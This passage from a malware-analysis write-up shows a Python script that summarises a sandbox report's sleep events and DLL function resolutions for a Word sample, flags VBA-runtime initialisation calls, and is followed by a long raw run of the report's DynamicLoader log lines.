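# when the sample is an Office document. Keys are lower-cased DLL names.
WATCH_LIST = {
    "vbe7.dll": {"DllVbeInit"},
    "mso.dll": {"_MsoVbaInitSecurity@4", "_MsoVbaInitSecurityEx@4",
                "_MsoVBADigSigCallDlg@20", "_MsoVBADigSig2CallDlgEx@28"},
    "ole32.dll": {"CoCreateInstance", "CoCreateInstanceEx", "CLSIDFromProgIDEx"},
    "kernel32.dll": {"LoadLibraryW"},
}

# Constructed excerpt of the Signatures section (a dozen of its several hundred lines).
SAMPLE = """
Process: splwow64.exe tried to sleep 1320 seconds, actually delayed analysis time by 0 seconds
Process: WINWORD.EXE tried to sleep 570 seconds, actually delayed analysis time by 0 seconds
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/
"""


def parse_signatures(text):
    """Split the Signatures text into sleep events and per-DLL dynamic-load stats."""
    sleeps = []
    loads = defaultdict(lambda: {"total": 0, "unnamed": 0, "names": set()})
    for line in text.strip().splitlines():
        if m := RE_SLEEP.search(line):
            sleeps.append({"process": m.group(1), "requested_s": int(m.group(2)),
                           "actual_s": int(m.group(3))})
        elif m := RE_DYNLOAD.search(line):
            entry = loads[m.group(1).lower()]
            entry["total"] += 1
            if m.group(2):
                entry["names"].add(m.group(2))
            else:
                entry["unnamed"] += 1  # no name recorded, typically an ordinal lookup
    return sleeps, dict(loads)


def sleep_budget(sleeps, timeout_s=ANALYSIS_TIMEOUT_S):
    """Per process: requested vs. actually elapsed sleep, and whether the request
    alone would have outlasted the analysis timeout had the sandbox honoured it."""
    out = {}
    for s in sleeps:
        p = out.setdefault(s["process"], {"requested_s": 0, "actual_s": 0})
        p["requested_s"] += s["requested_s"]
        p["actual_s"] += s["actual_s"]
    for p in out.values():
        p["skipped_s"] = p["requested_s"] - p["actual_s"]
        p["exceeds_timeout"] = p["requested_s"] > timeout_s
    return out


def watch_hits(loads):
    """(dll, function) pairs from the watch-list that were actually resolved."""
    return sorted((dll, fn) for dll, e in loads.items()
                  for fn in e["names"] & WATCH_LIST.get(dll, set()))


def summarize(loads):
    """Rows of (dll, total resolutions, distinct names, unnamed), busiest DLL first."""
    rows = [(dll, e["total"], len(e["names"]), e["unnamed"]) for dll, e in loads.items()]
    return sorted(rows, key=lambda r: (-r[1], r[0]))


if __name__ == "__main__":
    sleeps, loads = parse_signatures(SAMPLE)
    for proc, b in sleep_budget(sleeps).items():
        print("%-14s requested %5ds, skipped %5ds, exceeds %ds timeout: %s"
              % (proc, b["requested_s"], b["skipped_s"], ANALYSIS_TIMEOUT_S, b["exceeds_timeout"]))
    for row in summarize(loads):
        print("%-14s total=%d named=%d unnamed=%d" % row)
    print("watch-list hits:", watch_hits(loads))
```

Fed the whole Signatures section, the per-DLL table shrinks several hundred lines to a handful of rows, with mso.dll dominating through unnamed resolutions; that is normal for Word 2010 and not evidence on its own. The watch-list hits are where to spend time: VBE7.DLL/DllVbeInit and the _MsoVbaInitSecurity entries show the VBA runtime being brought up, which a document with no macros would not need, so the next step is static extraction of any macro streams rather than trusting the score line alone.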
Dynamic (imported) function loading detected
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKWord.dll/FValidateWordFile
DynamicLoader: GKWord.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: UxTheme.DLL/EnableThemeDialogTexture
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/RpcMgmtIsServerListening
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/StartDocDlgW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/ResetPrinterW
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/ReadPrinter
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/AbortPrinter
DynamicLoader: Winspool.DRV/DocumentEvent
DynamicLoader: Winspool.DRV/QuerySpoolMode
DynamicLoader: Winspool.DRV/QueryRemoteFonts
DynamicLoader: Winspool.DRV/SeekPrinter
DynamicLoader: Winspool.DRV/QueryColorProfile
DynamicLoader: Winspool.DRV/SplDriverUnloadComplete
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: Winspool.DRV/GetSpoolFileHandle
DynamicLoader: Winspool.DRV/CommitSpoolData
DynamicLoader: Winspool.DRV/CloseSpoolFileHandle
DynamicLoader: Winspool.DRV/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetCharABCWidthsI
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: GdiPlus.dll/GdiplusStartup
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat
DynamicLoader: GdiPlus.dll/GdipGetImageFlags
DynamicLoader: GdiPlus.dll/GdipGetImageWidth
DynamicLoader: GdiPlus.dll/GdipGetImageHeight
DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat
DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution
DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution
DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount
DynamicLoader: GdiPlus.dll/GdipDisposeImage
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeletePath
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/_MsoFTranslateCp@16
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/RegisterTypeLibForUser
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/DllDebugObjectRPCHook
DynamicLoader: Comctl32.dll/ImageList_Destroy
DynamicLoader: Comctl32.dll/ImageList_GetIconSize
DynamicLoader: Comctl32.dll/InitCommonControls
DynamicLoader: Comctl32.dll/ImageList_LoadImageA
DynamicLoader: Comctl32.dll/ImageList_SetOverlayImage
DynamicLoader: Comctl32.dll/ImageList_AddMasked
DynamicLoader: Comctl32.dll/ImageList_GetImageInfo
DynamicLoader: Comctl32.dll/ImageList_Draw
DynamicLoader: Comctl32.dll/ImageList_DrawEx
DynamicLoader: Comctl32.dll/PropertySheetA
DynamicLoader: Comctl32.dll/DestroyPropertySheetPage
DynamicLoader: Comctl32.dll/CreatePropertySheetPageA
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiTransparentBlt
DynamicLoader: GDI32.dll/GdiAlphaBlend
DynamicLoader: GDI32.dll/GdiGradientFill
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePath
DynamicLoader: GdiPlus.dll/GdipStartPathFigure
DynamicLoader: GdiPlus.dll/GdipAddPathLine2
DynamicLoader: GdiPlus.dll/GdipClosePathFigure
DynamicLoader: GdiPlus.dll/GdipClonePath
DynamicLoader: GdiPlus.dll/GdipCreateMatrix2
DynamicLoader: GdiPlus.dll/GdipTransformPath
DynamicLoader: GdiPlus.dll/GdipDeleteMatrix
DynamicLoader: GdiPlus.dll/GdipAddPathPolygon
DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds
DynamicLoader: GdiPlus.dll/GdipCreatePen1
DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819
DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin
DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit
DynamicLoader: GdiPlus.dll/GdipCreatePathIter
DynamicLoader: GdiPlus.dll/GdipPathIterRewind
DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath
DynamicLoader: GdiPlus.dll/GdipPathIterCopyData
DynamicLoader: GdiPlus.dll/GdipDeletePathIter
DynamicLoader: GdiPlus.dll/GdipAddPathLine
DynamicLoader: GdiPlus.dll/GdipClonePen
DynamicLoader: GdiPlus.dll/GdipSetPenStartCap
DynamicLoader: GdiPlus.dll/GdipSetPenEndCap
DynamicLoader: GdiPlus.dll/GdipDeletePen
DynamicLoader: GdiPlus.dll/GdipCreateFromHDC
DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode
DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality
DynamicLoader: GdiPlus.dll/GdipSetPageUnit
DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipTransformPoints
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics
DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext
DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform
DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes
DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode
DynamicLoader: GdiPlus.dll/GdipGetImageType
DynamicLoader: GdiPlus.dll/GdipGetImageBounds
DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes
DynamicLoader: GdiPlus.dll/GdipDeleteGraphics
DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap
DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: Comctl32.dll/CreateToolbarEx
DynamicLoader: Comctl32.dll/ImageList_DrawEx
DynamicLoader: Comctl32.dll/ImageList_LoadImageA
DynamicLoader: Comctl32.dll/ImageList_Destroy
DynamicLoader: Comctl32.dll/ImageList_SetBkColor
DynamicLoader: Comctl32.dll/CreateMappedBitmap
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: mso.dll/
DynamicLoader: UxTheme.DLL/IsThemeActive
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
